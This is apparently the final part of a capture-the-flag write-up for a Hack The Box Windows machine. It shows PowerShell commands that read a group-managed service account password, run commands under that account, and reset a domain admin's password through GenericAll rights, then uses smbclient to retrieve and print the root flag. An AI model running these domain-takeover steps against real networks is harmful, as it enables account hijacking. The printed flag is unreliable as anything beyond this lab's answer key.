msDS-GroupMSAMembership (PrincipalsAllowedToRetrieveManagedPassword) - stores the security principals that can access the GMSA password.
msds-ManagedPassword - This attribute contains a BLOB with password information for group-managed service accounts.
msDS-ManagedPasswordId - This constructed attribute contains the key identifier for the current managed password data for a group MSA.
msDS-ManagedPasswordInterval - This attribute is used to retrieve the number of days before a managed password is automatically changed for a group MSA.

Based on these both blogs, we can run commands as BIR-ADFS-GMSA to set an environment to access domain admin

1
2
3
4
5
$user = 'BIR-ADFS-GMSA$'
$gmsa = Get-ADServiceAccount -Identity $user -Properties 'msDS-ManagedPassword'
$blob = $gmsa.'msDS-ManagedPassword'
$mp = ConvertFrom-ADManagedPasswordBlob $blob
$cred = New-Object System.Management.Automation.PSCredential $user, $mp.SecureCurrentPassword

With these above we are setting up the GMSA password to be used and runas ‘BIR-ADFS-GMSA$’ user.

Everything is set, now we need to invoke commands to run any type of script/command.

1
Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {whoami}

For that we will use above command to know which user access we have right now.

As you can see ‘whoami’ result is showing that we are ‘BIR-ADFS-GMSA$’ user, not ‘Sierra’. Let’s look into Bloodhound one more time.

Let’s look into help of ‘Generic all’.

As you can see ‘Generic All’ privileges simply means full control over ‘Tristan’ user, who is also a domain admin. Let’s change the domain admin password.

1
2
3
4
5
PS C:\Users\Sierra.Frye\Documents> 

Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {net user Tristan.Davies qwerty1234 /domain}

The command completed successfully.

Now we can access admin directory to read the root flag.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(root💀kali)-[~/hackthebox/machine/search]
└─# smbclient //search.htb/C$ -U Tristan.Davies
Enter WORKGROUP\Tristan.Davies's password: 
Try "help" to get a list of possible commands.
smb: \> cd \Users\Administrator\Desktop
smb: \Users\Administrator\Desktop\> ls
  .                                 DRc        0  Mon Nov 22 15:21:49 2021
  ..                                DRc        0  Mon Nov 22 15:21:49 2021
  desktop.ini                       AHS      282  Mon Nov 22 15:21:49 2021
  root.txt                          ARc       34  Fri Jan  7 11:13:49 2022

                3246079 blocks of size 4096. 461189 blocks available
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 34 as root.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)


┌──(root💀kali)-[~/hackthebox/machine/search]
└─# cat root.txt        
e66ca102d9ee6b0894fffa9a65b13e18

Summary of knowledge

  • kerbrute enumerate valid usernames
  • crackmapexec password spray
  • bloodhound information gathering
  • Kerberoasting without SPNs
  • hashcat crack service account’s hash
  • XLS file remove password protection
  • browser digital certificate password crack using p12tool
  • using gMSADumper read GMSA password
  • change the domain admin password to privesc

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…